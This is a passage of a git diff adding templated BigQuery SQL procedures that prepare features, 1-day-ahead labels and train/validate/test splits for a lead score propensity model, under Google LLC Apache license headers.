+CREATE OR REPLACE TEMP TABLE inference_preparation as ( + SELECT DISTINCT + UD.user_pseudo_id, + UD.user_id, + UD.feature_date, + UD.user_ltv_revenue, + UD.device_category, + UD.device_mobile_brand_name, + UD.device_mobile_model_name, + UD.device_os, + UD.device_language, + UD.device_web_browser, + UD.geo_sub_continent, + UD.geo_country, + UD.geo_region, + UD.geo_city, + UD.geo_metro, + UD.last_traffic_source_medium, + UD.last_traffic_source_name, + UD.last_traffic_source_source, + UD.first_traffic_source_medium, + UD.first_traffic_source_name, + UD.first_traffic_source_source, + UD.has_signed_in_with_user_id{% for feature in short_list_features %}, + UWLM.{{feature.feature_name}}_past_1_day, + UWLM.{{feature.feature_name}}_past_2_day, + UWLM.{{feature.feature_name}}_past_3_day, + UWLM.{{feature.feature_name}}_past_4_day, + UWLM.{{feature.feature_name}}_past_5_day{% endfor %} +FROM + inference_preparation_ud UD +INNER JOIN + inference_preparation_uwlm UWLM +ON + UWLM.user_pseudo_id = UD.user_pseudo_id + AND UWLM.feature_date = UD.feature_date +); + +DELETE FROM `{{project_id}}.{{dataset}}.{{insert_table}}` WHERE TRUE; + +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +( + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %} +) +SELECT DISTINCT +feature_date, + user_pseudo_id, + user_id, + MIN(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date) as user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %} +FROM inference_preparation; + + +CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.lead_score_propensity_inference_5_1` AS( + SELECT DISTINCT + CURRENT_TIMESTAMP() AS processed_timestamp, + feature_date, + user_pseudo_id, + LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_id, + LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_ltv_revenue, + LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_category, + LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_brand_name, + LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_model_name, + 
LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_os, + LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_language, + LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_web_browser, + LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_sub_continent, + LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_country, + LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_region, + LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_city, + LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_metro, + LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_medium, + LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_name, + LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_source, + LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_medium, + LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_name, + LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_source, + LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS has_signed_in_with_user_id{% for feature in short_list_features %}, + LAST_VALUE({{feature.feature_name}}_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_1_day, + LAST_VALUE({{feature.feature_name}}_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_2_day, + LAST_VALUE({{feature.feature_name}}_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_3_day, + LAST_VALUE({{feature.feature_name}}_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_4_day, + LAST_VALUE({{feature.feature_name}}_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_5_day{% endfor %} + FROM `{{project_id}}.{{dataset}}.{{insert_table}}` +); + + +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_inference_5_1` +(processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %}) +OPTIONS( 
+ --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), + friendly_name="v_lead_score_propensity_inference_5_1", + description="View Lead Score Propensity Inference dataset using 5 days back to predict 1 day ahead. View expires after 48h and should run daily.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %} +FROM ( +SELECT DISTINCT + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + -- Row number partitioned by user pseudo id ordered by feature date descending + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_inference_5_1` +) +WHERE + -- Filter only for the most recent user example + user_row_order = 1; + diff --git a/sql/procedure/lead_score_propensity_label.sqlx b/sql/procedure/lead_score_propensity_label.sqlx new file mode 100644 index 00000000..fc27c071 --- /dev/null +++ b/sql/procedure/lead_score_propensity_label.sqlx @@ -0,0 +1,102 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- Run these windows aggregations every day. For each date in training and inference date ranges. 
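+-- The procedure builds the 1-day-ahead {{target_event}} label: it counts {{target_event}} events on the day after `input_date` for every user with a valid session, caps the count at 1, and MERGEs the result into `{{insert_table}}`.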
+-- Sets the procedure to look back from the day before `input_date` until the day before `end_date` +SET input_date = DATE_SUB(input_date, INTERVAL 1 DAY); +SET end_date = DATE_SUB(end_date, INTERVAL 1 DAY); + +-- Future User metrics: 1-day future {{target_event}}s per user +CREATE OR REPLACE TEMP TABLE future_{{target_event}}s_per_user AS ( + SELECT + -- User's unique identifier + user_pseudo_id, + -- The date for which future {{target_event}}s are being calculated + input_date as event_date, + -- Counts the distinct {{target_event}} events that happened exactly 1 day after `input_date`, taking the maximum per user + MAX(COUNT(DISTINCT CASE DATE_DIFF(event_date, input_date, DAY) = 1 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E + INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D + ON E.device_type_id = D.device_type_id + -- Filters events to be within the date range defined by input_date and end_date from dates_interval + WHERE event_date BETWEEN input_date AND end_date + -- Filter events with event name {{target_event}} + AND LOWER(E.event_name) IN ('{{target_event}}') + AND E.ga_session_id IS NOT NULL + AND D.device_os IS NOT NULL + -- Grouping by user pseudo ids + GROUP BY user_pseudo_id +); + +-- All users in the platform +CREATE OR REPLACE TEMP TABLE all_users_possible_{{target_event}}s as ( + SELECT DISTINCT + -- User's unique identifier + Users.user_pseudo_id, + -- The event date for which {{target_event}}s are being considered + Days.event_date as event_date, + -- Placeholder column for the 1-day-ahead {{target_event}} count + NULL as {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users + CROSS JOIN + -- Generates the dates between `input_date` and `end_date`, later filtered down to `input_date` + (SELECT event_date FROM UNNEST(GENERATE_DATE_ARRAY(input_date, end_date, INTERVAL 1 DAY)) AS event_date) Days + WHERE Days.event_date = input_date + -- Filter events with valid sessions + AND Users.ga_session_id IS NOT NULL +); + + +CREATE OR REPLACE TEMP TABLE DataForTargetTable AS +SELECT DISTINCT + -- Timestamp when the data was processed + CURRENT_TIMESTAMP() AS processed_timestamp, + -- The date for which {{target_event}}s are being considered + A.event_date as feature_date, + -- User's unique identifier + A.user_pseudo_id, + -- Binary label: 1 if the user performed at least one {{target_event}} on day 1, 0 otherwise + LEAST(COALESCE(B.{{target_event}}_day_1, 0), 1) AS {{target_event}}_day_1 +FROM all_users_possible_{{target_event}}s AS A +LEFT JOIN future_{{target_event}}s_per_user AS B +ON B.user_pseudo_id = A.user_pseudo_id +; + +-- Updates or inserts data into the target table +MERGE `{{project_id}}.{{dataset}}.{{insert_table}}` I +USING DataForTargetTable T +ON I.feature_date = T.feature_date + AND I.user_pseudo_id = T.user_pseudo_id +WHEN MATCHED THEN + -- Updates existing records + UPDATE SET + -- Updates the processed timestamp + I.processed_timestamp = T.processed_timestamp, + -- Updates the {{target_event}} label for day 1 + I.{{target_event}}_day_1 = T.{{target_event}}_day_1 +WHEN NOT MATCHED THEN + -- Inserts new records + INSERT + (processed_timestamp, + feature_date, + user_pseudo_id, + {{target_event}}_day_1) + VALUES + (T.processed_timestamp, + T.feature_date, + T.user_pseudo_id, + T.{{target_event}}_day_1) +; + +SET rows_added = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{project_id}}.{{dataset}}.{{insert_table}}`); diff --git
a/sql/procedure/lead_score_propensity_training_preparation.sqlx b/sql/procedure/lead_score_propensity_training_preparation.sqlx new file mode 100644 index 00000000..5d0f61e3 --- /dev/null +++ b/sql/procedure/lead_score_propensity_training_preparation.sqlx @@ -0,0 +1,569 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +DECLARE custom_start_date DATE DEFAULT NULL; +DECLARE custom_end_date DATE DEFAULT NULL; + +-- custom_start_date: The start date of the data to be used for training. +-- custom_end_date: The end date of the data to be used for training. +SET custom_start_date = PARSE_DATE("%Y-%m-%d", {{custom_start_date}}); +SET custom_end_date = PARSE_DATE("%Y-%m-%d", {{custom_end_date}}); + +-- The procedure first checks if the custom_start_date and custom_end_date parameters are valid. +-- If either parameter is not valid, the procedure sets the corresponding date to the maximum or +-- minimum date of the available data. +IF custom_start_date IS NOT NULL AND custom_start_date >= start_date AND custom_start_date <= end_date + AND custom_start_date < custom_end_date THEN + SET start_date = custom_start_date; +END IF; + +IF custom_end_date IS NOT NULL AND custom_end_date <= end_date AND custom_end_date >= start_date + AND custom_end_date > custom_start_date THEN + SET end_date = custom_end_date; +END IF; + +-- This is a temp table consolidating user_dimensions over the dates intervals. 
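+-- Each dimension is deduplicated by taking MAX() over a window partitioned by user_pseudo_id and feature_date, so the SELECT DISTINCT keeps one row per user per day.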
+CREATE OR REPLACE TEMP TABLE training_preparation_ud as ( + SELECT DISTINCT + -- The user pseudo id + UD.user_pseudo_id, + -- The user id + MAX(UD.user_id) OVER(user_dimensions_window) AS user_id, + -- The feature date + UD.feature_date, + -- The user lifetime value revenue + MAX(UD.user_ltv_revenue) OVER(user_dimensions_window) AS user_ltv_revenue, + -- The device category + MAX(UD.device_category) OVER(user_dimensions_window) AS device_category, + -- The device brand name + MAX(UD.device_mobile_brand_name) OVER(user_dimensions_window) AS device_mobile_brand_name, + -- The device model name + MAX(UD.device_mobile_model_name) OVER(user_dimensions_window) AS device_mobile_model_name, + -- The device operating system + MAX(UD.device_os) OVER(user_dimensions_window) AS device_os, + -- The device language + MAX(UD.device_language) OVER(user_dimensions_window) AS device_language, + -- The device web browser + MAX(UD.device_web_browser) OVER(user_dimensions_window) AS device_web_browser, + -- The user sub continent + MAX(UD.geo_sub_continent) OVER(user_dimensions_window) AS geo_sub_continent, + -- The user country + MAX(UD.geo_country) OVER(user_dimensions_window) AS geo_country, + -- The user region + MAX(UD.geo_region) OVER(user_dimensions_window) AS geo_region, + -- The user city + MAX(UD.geo_city) OVER(user_dimensions_window) AS geo_city, + -- The user metro + MAX(UD.geo_metro) OVER(user_dimensions_window) AS geo_metro, + -- The user last traffic source medium + MAX(UD.last_traffic_source_medium) OVER(user_dimensions_window) AS last_traffic_source_medium, + -- The user last traffic source name + MAX(UD.last_traffic_source_name) OVER(user_dimensions_window) AS last_traffic_source_name, + -- The user last traffic source source + MAX(UD.last_traffic_source_source) OVER(user_dimensions_window) AS last_traffic_source_source, + -- The user first traffic source medium + MAX(UD.first_traffic_source_medium) OVER(user_dimensions_window) AS first_traffic_source_medium, + -- The user first traffic source name + MAX(UD.first_traffic_source_name) OVER(user_dimensions_window) AS first_traffic_source_name, + -- The user first traffic source source + MAX(UD.first_traffic_source_source) OVER(user_dimensions_window) AS first_traffic_source_source, + -- Whether the user has signed in with user ID + MAX(UD.has_signed_in_with_user_id) OVER(user_dimensions_window) AS has_signed_in_with_user_id, +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_dimensions` UD +WHERE + -- Filter feature dates according to the defined date interval + UD.feature_date BETWEEN start_date AND end_date +WINDOW + user_dimensions_window AS (PARTITION BY UD.user_pseudo_id, UD.feature_date ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating user rolling metrics over the dates intervals. 
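+-- The short_list_features Jinja loop expands into one MAX() per selected feature for each of the past 1 to 5 day windows.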
+CREATE OR REPLACE TEMP TABLE training_preparation_uwlm as ( + SELECT DISTINCT + -- User pseudo id + UWLM.user_pseudo_id, + -- Feature date + UWLM.feature_date{% for feature in short_list_features %}, + -- Calculate the maximum value for each metric over the window + MAX(UWLM.{{feature.feature_name}}_past_1_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_1_day, + MAX(UWLM.{{feature.feature_name}}_past_2_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_2_day, + MAX(UWLM.{{feature.feature_name}}_past_3_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_3_day, + MAX(UWLM.{{feature.feature_name}}_past_4_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_4_day, + MAX(UWLM.{{feature.feature_name}}_past_5_day) OVER(user_rolling_lead_window) AS {{feature.feature_name}}_past_5_day{% endfor %} +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.user_rolling_window_lead_metrics` UWLM +WHERE + -- In the future consider `feature_date BETWEEN start_date AND end_date`, to process multiple days. Modify Partition BY + UWLM.feature_date BETWEEN start_date AND end_date +WINDOW + user_rolling_lead_window AS (PARTITION BY UWLM.user_pseudo_id, UWLM.feature_date ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating user labels over the dates intervals. +CREATE OR REPLACE TEMP TABLE training_preparation_label as ( + SELECT DISTINCT + LABEL.user_pseudo_id, -- The unique identifier for the user. + LABEL.feature_date, -- The date for which the features are extracted. + MAX(LABEL.{{target_event}}_day_1) OVER(lead_score_propensity_label_window) AS {{target_event}}_day_1, -- Whether the user made a {{target_event}} on day 1. +FROM + `{{feature_store_project_id}}.{{feature_store_dataset}}.lead_score_propensity_label` LABEL +WHERE + -- Define the training subset interval + LABEL.feature_date BETWEEN start_date AND end_date +WINDOW + lead_score_propensity_label_window AS (PARTITION BY LABEL.user_pseudo_id, LABEL.feature_date ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) +); + +-- This is a temp table consolidating all features and labels over the dates intervals. 
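+-- The INNER JOINs keep only users that have dimensions, rolling window metrics and a label for the same feature_date.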
+CREATE OR REPLACE TEMP TABLE training_preparation as ( + SELECT DISTINCT + UD.user_pseudo_id, + UD.user_id, + UD.feature_date, + COALESCE(UD.user_ltv_revenue, 0.0) AS user_ltv_revenue, + UD.device_category, + UD.device_mobile_brand_name, + UD.device_mobile_model_name, + UD.device_os, + UD.device_language, + UD.device_web_browser, + UD.geo_sub_continent, + UD.geo_country, + UD.geo_region, + UD.geo_city, + UD.geo_metro, + UD.last_traffic_source_medium, + UD.last_traffic_source_name, + UD.last_traffic_source_source, + UD.first_traffic_source_medium, + UD.first_traffic_source_name, + UD.first_traffic_source_source, + UD.has_signed_in_with_user_id,{% for feature in short_list_features %} + UWLM.{{feature.feature_name}}_past_1_day, + UWLM.{{feature.feature_name}}_past_2_day, + UWLM.{{feature.feature_name}}_past_3_day, + UWLM.{{feature.feature_name}}_past_4_day, + UWLM.{{feature.feature_name}}_past_5_day,{% endfor %} + LABEL.{{target_event}}_day_1 +FROM + training_preparation_ud UD +INNER JOIN + training_preparation_uwlm UWLM +ON + UWLM.user_pseudo_id = UD.user_pseudo_id + AND UWLM.feature_date = UD.feature_date +INNER JOIN + training_preparation_label LABEL +ON + LABEL.user_pseudo_id = UD.user_pseudo_id + AND LABEL.feature_date = UD.feature_date +); + +-- This is a temp table splitting the rows into the different data splits (TRAIN, VALIDATE, TEST) based on a FARM_FINGERPRINT hash of the user_pseudo_id. +CREATE OR REPLACE TEMP TABLE DataForTargetTable AS( + SELECT DISTINCT + CASE + WHEN (ABS(MOD(FARM_FINGERPRINT(user_pseudo_id), 10)) BETWEEN 0 AND train_split_end_number) THEN "TRAIN" + WHEN (ABS(MOD(FARM_FINGERPRINT(user_pseudo_id), 10)) BETWEEN train_split_end_number AND validation_split_end_number) THEN "VALIDATE" + WHEN (ABS(MOD(FARM_FINGERPRINT(user_pseudo_id), 10)) BETWEEN validation_split_end_number AND 9) THEN "TEST" + END as data_split, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + {{target_event}}_day_1 + FROM training_preparation); + +CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.lead_score_propensity_training_full_dataset` AS +SELECT DISTINCT * FROM DataForTargetTable +WHERE data_split IS NOT NULL; + + +-- This is a table preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 day.
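+-- LAST_VALUE() over the (user_pseudo_id, feature_date) window deduplicates the features, and the binary will_{{target_event}} label is derived from {{target_event}}_day_1.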
+CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` AS( + SELECT DISTINCT + CURRENT_TIMESTAMP() AS processed_timestamp, + data_split, + feature_date, + user_pseudo_id, + LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, + LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_ltv_revenue, + LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, + LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, + LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, + LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, + LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, + LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, + LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, + LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, + LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, + LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, + LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, + LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, + LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, + LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, + LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, + LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, + LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, + LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id,{% for feature in short_list_features %} + LAST_VALUE({{feature.feature_name}}_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_1_day, + LAST_VALUE({{feature.feature_name}}_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_2_day, + LAST_VALUE({{feature.feature_name}}_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_3_day, + LAST_VALUE({{feature.feature_name}}_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_4_day, + 
LAST_VALUE({{feature.feature_name}}_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS {{feature.feature_name}}_past_5_day,{% endfor %} + -- Calculate the will {{target_event}} label. + -- Label for the lead score propensity model. It indicates whether the user performed a {{target_event}} event within the next 1 day, based on their recent activity. + -- This label is then used to train a model that can predict the likelihood of future {{target_event}}s for other users. + LAST_VALUE(CASE WHEN ({{target_event}}_day_1) = 0 THEN 0 ELSE 1 END) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) as will_{{target_event}} + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_training_full_dataset` +); + + +-- This is a view preparing rows for lead score propensity modelling looking back 5 days and looking ahead 1 day. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_lead_score_propensity_training_5_1` +(processed_timestamp, + data_split, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_lead_score_propensity_training_5_1", + description="View Lead Score Propensity Training dataset using 5 days back to predict 1 day ahead. View expires after 48h and should run daily.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + * EXCEPT(feature_date, row_order_peruser_persplit) +FROM ( +SELECT DISTINCT + processed_timestamp, + user_pseudo_id, + data_split, + feature_date, + -- Number the rows per user, per split and per label, ordered by feature date; the MOD filter below keeps one example per 5-day window.
+ ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_{{target_event}} ORDER BY feature_date ASC) AS row_order_peruser_persplit, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}} +FROM( +SELECT DISTINCT + processed_timestamp, + data_split, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id,{% for feature in short_list_features %} + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day,{% endfor %} + will_{{target_event}}, + -- Numbers the rows per user, per day, per split so that only one row per user, per day, per split is kept. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_{{target_event}} ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit + FROM 